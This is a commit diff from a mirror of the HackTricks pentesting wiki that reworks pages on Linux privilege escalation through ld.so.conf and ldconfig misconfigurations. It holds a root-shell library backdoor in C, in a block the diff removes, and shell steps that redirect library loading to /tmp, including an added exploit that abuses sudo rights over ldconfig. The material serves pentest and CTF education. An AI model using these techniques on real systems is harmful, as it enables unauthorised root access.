0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] 3 pages modified

This commit is contained in:
CPol 2020-08-27 14:22:53 +00:00 committed by gitbook-bot
parent f1023f74c6
commit 1454af6b14
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
3 changed files with 46 additions and 50 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
SUMMARY.md
View File

@ -20,7 +20,7 @@
* [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
* [ld.so.conf example](linux-unix/privilege-escalation/ld.so.conf-example.md)
* [ld.so exploit example](linux-unix/privilege-escalation/ld.so.conf-example.md)
* [Escaping from a Docker container](linux-unix/privilege-escalation/escaping-from-a-docker-container.md)
* [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md)
* [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)

54
linux-unix/privilege-escalation/README.md
View File

@ -873,38 +873,6 @@ echo "Defaults !tty_tickets" > /etc/sudoers.d/win
echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win
```
### /etc/ld.so.conf.d/
If you can create a file in `/etc/ld.so.conf.d/` and you can execute **`ldconfig`**with root privileges \(sudo or suid\) then you can **make executable load arbitrary libraries**.
For example, to make executables in that system load libraries from _/tmp_ you can **create** in that folder a **config file** \(_test.conf_\) pointing to _/tmp_:
{% code title="/etc/ld.so.conf.d/test.conf" %}
```bash
/tmp
```
{% endcode %}
And when executing **`ldconfig`**all the **binaries inside the system will be able to load libraries** from _/tmp_.
So if there is a **binary** that **executes** a function called **`seclogin()`** from a **library** called **`libseclogin.so`** , you can create a backdoor in _/tmp_ and impersonate that libraries with that function:
{% code title="/tmp/libseclogin.so" %}
```c
#include <stdio.h>
//To compile: gcc -fPIC -shared -o libseclogin.so exploit.c
seclogin() {
setgid(0); setuid(0);
system("/bin/bash");
}
```
{% endcode %}
Note in the next image that \(_having already created the backdoor on /tmp_\) having the config file in _/etc/ld.so.conf.d_ pointing to _/tmp_ after using `ldconfig` the executable `myexec`stops loading the library from `/usr/lib` and loads it from _/tmp_:
![](../../.gitbook/assets/image%20%28101%29.png)
_This example was taken from the HTB machine: Dab._
### DOAS
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
@ -915,26 +883,18 @@ permit nopass demo as root cmd vim
## Shared Library
#### ldconfig
### ld.so
Identify shared libraries with `ldd`
The file `/etc/ld.so.conf` indicates **where are loaded the configurations files from**. Typically, this file contains the following path: `include /etc/ld.so.conf.d/*.conf`
```text
$ ldd /opt/binary
linux-vdso.so.1 (0x00007ffe961cd000)
vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)
```
That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be read. This configuration files **points to another folders** where **libraries** are going to be **searched** for. For example, the content of `/etc/ld.so.conf.d/libc.conf` is `/usr/local/lib`. **This means that the system will search for libraries inside `/usr/local/lib`**.
Create a library in `/tmp` and activate the path.
If for some reason **a user has write permissions** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder indicated inside any config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges.
Take a look about **how to exploit this misconfiguration** in the following page:
```text
gcc Wall fPIC shared o vulnlib.so /tmp/vulnlib.c
echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
/opt/binary
```
{% page-ref page="ld.so.conf-example.md" %}
#### RPATH
### RPATH
```text
level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"

40
linux-unix/privilege-escalation/ld.so.conf-example.md
View File

@ -1,4 +1,4 @@
# ld.so.conf example
# ld.so exploit example
## Prepare the environment
@ -111,9 +111,45 @@ ubuntu
Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges.
{% endhint %}
### Other misconfigurations - Same vuln
In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.
But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it.
## Exploit 2
**Suppose you have sudo privileges over `ldconfig`**.
You can indicate `ldconfig` **where to load the conf files from**, so we can take advantage of it to make `ldconfig` load arbitrary folders.
So, lets create the files and folders needed to load "/tmp":
```bash
cd /tmp
echo "include /tmp/conf/*" > fake.ld.so.conf
echo "/tmp" > conf/evil.conf
```
Now, as indicated in the **previous exploit**, **create the malicious library inside** _**/tmp**_.
And finally, lets load the path and check where is the binary loading the library from:
```bash
ldconfig -f fake.ld.so.conf
ldd sharedvuln
linux-vdso.so.1 => (0x00007fffa2dde000)
libcustom.so => /tmp/libcustom.so (0x00007fcb07756000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000)
/lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000)
```
**As you can see, having sudo privileges over `ldconfig` you can exploit the same vulnerability.**
{% hint style="info" %}
I **didn't find** a reliable way to exploit this vuln if `ldconfig` is configured with the **suid bit**. The following error appear: `/sbin/ldconfig.real: Can't create temporary cache file /etc/ld.so.cache~: Permission denied`
{% endhint %}
## References
* [https://www.boiteaklou.fr/Abusing-Shared-Libraries.html](https://www.boiteaklou.fr/Abusing-Shared-Libraries.html)
* [https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2](https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2)
* Dab machine in HTB